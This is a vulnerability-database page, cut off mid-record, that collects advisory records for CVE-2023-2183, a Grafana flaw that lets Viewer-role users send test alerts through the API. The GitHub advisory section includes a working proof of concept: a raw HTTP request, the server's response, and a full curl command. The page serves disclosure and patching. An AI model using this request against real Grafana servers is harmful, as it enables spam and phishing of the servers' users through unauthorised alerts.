CVE-2023-2183 (GCVE-0-2023-2183)
Vulnerability from cvelistv5 – Published: 2023-06-06 18:04 – Updated: 2025-02-13 16:40
VLAI?
Summary
Grafana is an open-source platform for monitoring and observability.
The option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.
This might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.
Users may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.
Severity ?
4.1 (Medium)
CWE
Assigner
References
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Grafana | Grafana |
Affected:
8.0.0 , < 8.5.26
(semver)
Affected: 9.0.0 , < 9.2.19 (semver) Affected: 9.3.0 , < 9.3.15 (semver) Affected: 9.4.0 , < 9.4.12 (semver) Affected: 9.5.0 , < 9.5.3 (semver) |
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:12:20.655Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-2183",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-07T16:30:23.268015Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-07T16:30:50.109Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Grafana",
"vendor": "Grafana",
"versions": [
{
"lessThan": "8.5.26",
"status": "affected",
"version": "8.0.0",
"versionType": "semver"
},
{
"lessThan": "9.2.19",
"status": "affected",
"version": "9.0.0",
"versionType": "semver"
},
{
"lessThan": "9.3.15",
"status": "affected",
"version": "9.3.0",
"versionType": "semver"
},
{
"lessThan": "9.4.12",
"status": "affected",
"version": "9.4.0",
"versionType": "semver"
},
{
"lessThan": "9.5.3",
"status": "affected",
"version": "9.5.0",
"versionType": "semver"
}
]
},
{
"product": "Grafana Enterprise",
"vendor": "Grafana",
"versions": [
{
"lessThan": "8.5.26",
"status": "affected",
"version": "8.0.0",
"versionType": "semver"
},
{
"lessThan": "9.2.19",
"status": "affected",
"version": "9.0.0",
"versionType": "semver"
},
{
"lessThan": "9.3.15",
"status": "affected",
"version": "9.3.0",
"versionType": "semver"
},
{
"lessThan": "9.4.12",
"status": "affected",
"version": "9.4.0",
"versionType": "semver"
},
{
"lessThan": "9.5.3",
"status": "affected",
"version": "9.5.0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eGrafana is an open-source platform for monitoring and observability. \u003c/p\u003e\u003cp\u003eThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\u003c/p\u003e\u003cp\u003eThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\u003c/p\u003e\u003cp\u003eUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\u003c/p\u003e"
}
],
"value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix."
}
],
"impacts": [
{
"capecId": "CAPEC-180",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-180"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-06T18:06:27.533Z",
"orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"shortName": "GRAFANA"
},
"references": [
{
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"assignerShortName": "GRAFANA",
"cveId": "CVE-2023-2183",
"datePublished": "2023-06-06T18:04:26.485Z",
"dateReserved": "2023-04-19T12:11:08.488Z",
"dateUpdated": "2025-02-13T16:40:15.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-2183/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://security.netapp.com/advisory/ntap-20230706-0002/\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T06:12:20.655Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-2183\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-01-07T16:30:23.268015Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-01-07T16:30:39.868Z\"}}], \"cna\": {\"impacts\": [{\"capecId\": \"CAPEC-180\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-180\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 4.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Grafana\", \"product\": \"Grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"8.0.0\", \"lessThan\": \"8.5.26\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.0.0\", \"lessThan\": \"9.2.19\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.3.0\", \"lessThan\": \"9.3.15\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.4.0\", \"lessThan\": \"9.4.12\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.5.0\", \"lessThan\": \"9.5.3\", \"versionType\": \"semver\"}]}, {\"vendor\": \"Grafana\", \"product\": \"Grafana Enterprise\", \"versions\": [{\"status\": \"affected\", \"version\": \"8.0.0\", \"lessThan\": \"8.5.26\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.0.0\", \"lessThan\": \"9.2.19\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.3.0\", \"lessThan\": \"9.3.15\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.4.0\", \"lessThan\": \"9.4.12\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.5.0\", \"lessThan\": \"9.5.3\", \"versionType\": \"semver\"}]}], \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-2183/\"}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3\"}, {\"url\": \"https://security.netapp.com/advisory/ntap-20230706-0002/\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grafana is an open-source platform for monitoring and observability. \\n\\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\\n\\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\\n\\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\\n\\n\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003eGrafana is an open-source platform for monitoring and observability. \u003c/p\u003e\u003cp\u003eThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\u003c/p\u003e\u003cp\u003eThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\u003c/p\u003e\u003cp\u003eUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284\"}]}], \"providerMetadata\": {\"orgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"shortName\": \"GRAFANA\", \"dateUpdated\": \"2023-06-06T18:04:26.485Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-2183\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-01-07T16:30:50.109Z\", \"dateReserved\": \"2023-04-19T12:11:08.488Z\", \"assignerOrgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"datePublished\": \"2023-06-06T18:04:26.485Z\", \"assignerShortName\": \"GRAFANA\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-CVM3-PP2J-CHR3
Vulnerability from github – Published: 2023-06-12 20:09 – Updated: 2023-06-12 20:09
VLAI?
Summary
Grafana has Broken Access Control in Alert manager: Viewer can send test alerts
Details
Summary
Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.
Reason for the error: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.
This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.
Details
The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.
View of the panel for the user in the Viewer role:
Admin role - View panel for admin role:
Admin role - Next step – editing:
Admin role - Additional options:
PoC
HTTP Request by user in role Viewer
POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1
Host: xxx
Cookie: grafana_session=xxx
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana
accept: application/json, text/plain, */*
content-type: application/json
…
{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"<test@example.com>",
"singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}],
"alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com",
"more":"http://example.com "},"labels":{}}}
HTTP Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Expires: -1
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 05 Apr 2023 10:43:00 GMT
Content-Length: 471
{"alert":{"annotations":{"__value_string__":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst",
"more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test",
"testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}},
"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}],
"notified_at":"2023-04-05T12:43:00.1430203+02:00"}
Result:
The attacker can send as a template alert or plain/text.
Impact
As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.
From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.
CURL example – using a user session in the Viewer role:
curl -i -s -k -X $'POST' \
-H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
-b $'grafana_session=xxx' \
--data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<test@example.com>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
$'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'
Mitigation
- In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
- Check the API for the possibility of accessing this endpoint for other roles than admin
Severity ?
4.1 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.5.26"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.2.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.3.0"
},
{
"fixed": "9.3.15"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.4.0"
},
{
"fixed": "9.4.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "9.5.0"
},
{
"fixed": "9.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-2183"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-12T20:09:27Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nGrafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role. \n\n**Reason for the error**: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel. \n\nThis enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc\u2026), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.\n\n\n### Details\nThe logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert. \n\nView of the panel for the user in the Viewer role:\n\n\nAdmin role - View panel for admin role:\n\n\nAdmin role - Next step \u2013 editing:\n\n\nAdmin role - Additional options:\n\n\n\n\n### PoC\n\n**HTTP Request by user in role Viewer**\n```\nPOST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1\nHost: xxx\nCookie: grafana_session=xxx\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana\naccept: application/json, text/plain, */*\ncontent-type: application/json\n\u2026\n\n{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"\u003ctest@example.com\u003e\",\n\"singleEmail\":true},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\n\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com \",\"description\":\"tekst\",\"testowy\":\"test http://example.com\",\n\"more\":\"http://example.com \"},\"labels\":{}}}\n\n```\n\n**HTTP Response:**\n```\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nExpires: -1\nPragma: no-cache\nX-Content-Type-Options: nosniff\nX-Frame-Options: deny\nX-Xss-Protection: 1; mode=block\nDate: Wed, 05 Apr 2023 10:43:00 GMT\nContent-Length: 471\n\n{\"alert\":{\"annotations\":{\"__value_string__\":\"[ metric=\u0027foo\u0027 labels={instance=bar} value=10 ]\",\"description\":\"tekst\",\n\"more\":\"http://example.com\",\"runbook_url\":\"http://example.com\",\"summary\":\"Notification test\",\n\"testowy\":\"testowy http://example.com\"},\"labels\":{\"alertname\":\"TestAlert\",\"instance\":\"Grafana\"}},\n\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"name\":\"test\",\"uid\":\"ojUhNFL4k\",\"status\":\"ok\"}]}],\n\"notified_at\":\"2023-04-05T12:43:00.1430203+02:00\"}\n\n```\n\n## Result:\nThe attacker can send as a template alert or plain/text.\n\n\n\n\n### Impact\nAs I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server. \n\nFrom a practical point of view, this means that for each \"GrafanaReceiver\" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged. \n\nCURL example \u2013 using a user session in the Viewer role:\n\n```\ncurl -i -s -k -X $\u0027POST\u0027 \\\n -H $\u0027Host: localhost:3002\u0027 -H $\u0027Content-Length: 386\u0027 -H $\u0027sec-ch-ua: \\\"Not:A-Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"112\\\"\u0027 -H $\u0027accept: application/json, text/plain, */*\u0027 -H $\u0027content-type: application/json\u0027 -H $\u0027x-grafana-org-id: 1\u0027 -H $\u0027sec-ch-ua-mobile: ?0\u0027 -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36\u0027 -H $\u0027sec-ch-ua-platform: \\\"macOS\\\"\u0027 -H $\u0027Origin: http://localhost:3002\u0027 -H $\u0027Sec-Fetch-Site: same-origin\u0027 -H $\u0027Sec-Fetch-Mode: cors\u0027 -H $\u0027Sec-Fetch-Dest: empty\u0027 -H $\u0027Referer: http://localhost:3002/\u0027 -H $\u0027Accept-Encoding: gzip, deflate\u0027 -H $\u0027Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\u0027 -H $\u0027Connection: close\u0027 \\\n -b $\u0027grafana_session=xxx\u0027 \\\n --data-binary $\u0027{\\\"receivers\\\":[{\\\"name\\\":\\\"test\\\",\\\"grafana_managed_receiver_configs\\\":[{\\\"settings\\\":{\\\"addresses\\\":\\\"\u003ctest@example.com\u003e\\\",\\\"singleEmail\\\":true\\x0d\\x0a},\\\"secureSettings\\\":{},\\\"type\\\":\\\"email\\\",\\\"name\\\":\\\"test\\\",\\\"disableResolveMessage\\\":false}]}],\\\"alert\\\":{\\\"annotations\\\":{\\\"runbook_url\\\":\\\"http://example.com\\\",\\\"description\\\":\\\"tekst\\\",\\\"testowy\\\":\\\"testowy http://example.com\\\",\\x0d\\x0a\\\"more\\\":\\\"http://example.com\\\"\\x0d\\x0a},\\\"labels\\\":{}}}\\x0d\\x0a\u0027 \\\n $\u0027http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test\u0027\n```\n\n### Mitigation\n\n1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold. \n2. Check the API for the possibility of accessing this endpoint for other roles than admin\n",
"id": "GHSA-cvm3-pp2j-chr3",
"modified": "2023-06-12T20:09:27Z",
"published": "2023-06-12T20:09:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/bugbounty"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-2183"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Grafana has Broken Access Control in Alert manager: Viewer can send test alerts"
}
GSD-2023-2183
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
Grafana is an open-source platform for monitoring and observability.
The option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.
This might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.
Users may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-2183",
"id": "GSD-2023-2183"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-2183"
],
"details": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n",
"id": "GSD-2023-2183",
"modified": "2023-12-13T01:20:32.266750Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2023-2183",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Grafana",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "8.0.0",
"version_value": "8.5.26"
},
{
"version_affected": "\u003c",
"version_name": "9.0.0",
"version_value": "9.2.19"
},
{
"version_affected": "\u003c",
"version_name": "9.3.0",
"version_value": "9.3.15"
},
{
"version_affected": "\u003c",
"version_name": "9.4.0",
"version_value": "9.4.12"
},
{
"version_affected": "\u003c",
"version_name": "9.5.0",
"version_value": "9.5.3"
}
]
}
},
{
"product_name": "Grafana Enterprise",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "8.0.0",
"version_value": "8.5.26"
},
{
"version_affected": "\u003c",
"version_name": "9.0.0",
"version_value": "9.2.19"
},
{
"version_affected": "\u003c",
"version_name": "9.3.0",
"version_value": "9.3.15"
},
{
"version_affected": "\u003c",
"version_name": "9.4.0",
"version_value": "9.4.12"
},
{
"version_affected": "\u003c",
"version_name": "9.5.0",
"version_value": "9.5.3"
}
]
}
}
]
},
"vendor_name": "Grafana"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n"
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-284",
"lang": "eng",
"value": "CWE-284"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://grafana.com/security/security-advisories/cve-2023-2183/",
"refsource": "MISC",
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
},
{
"name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3",
"refsource": "MISC",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3"
},
{
"name": "https://security.netapp.com/advisory/ntap-20230706-0002/",
"refsource": "MISC",
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
]
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "\u003c8.5.26||\u003e=9.0.0 \u003c9.2.19||\u003e=9.3.0 \u003c9.3.15||\u003e=9.4.0 \u003c9.4.12||\u003e=9.5.0 \u003c9.5.3",
"affected_versions": "All versions before 8.5.26, all versions starting from 9.0.0 before 9.2.19, all versions starting from 9.3.0 before 9.3.15, all versions starting from 9.4.0 before 9.4.12, all versions starting from 9.5.0 before 9.5.3",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"cwe_ids": [
"CWE-1035",
"CWE-707",
"CWE-862",
"CWE-937"
],
"date": "2023-06-12",
"description": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n",
"fixed_versions": [
"8.5.26",
"9.2.19",
"9.3.15",
"9.4.12",
"9.5.3"
],
"identifier": "CVE-2023-2183",
"identifiers": [
"GHSA-cvm3-pp2j-chr3",
"CVE-2023-2183"
],
"not_impacted": "All versions starting from 8.5.26 before 9.0.0, all versions starting from 9.2.19 before 9.3.0, all versions starting from 9.3.15 before 9.4.0, all versions starting from 9.4.12 before 9.5.0, all versions starting from 9.5.3",
"package_slug": "go/github.com/grafana/grafana",
"pubdate": "2023-06-12",
"solution": "Upgrade to versions 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3 or above.",
"title": "Missing Authorization",
"urls": [
"https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3",
"https://nvd.nist.gov/vuln/detail/CVE-2023-2183",
"https://grafana.com/security/security-advisories/cve-2023-2183/",
"https://github.com/advisories/GHSA-cvm3-pp2j-chr3"
],
"uuid": "e11e36cf-de74-4268-bb9d-9fa96503d663"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.5.3",
"versionStartIncluding": "9.5.0",
"vulnerable": true
},
{
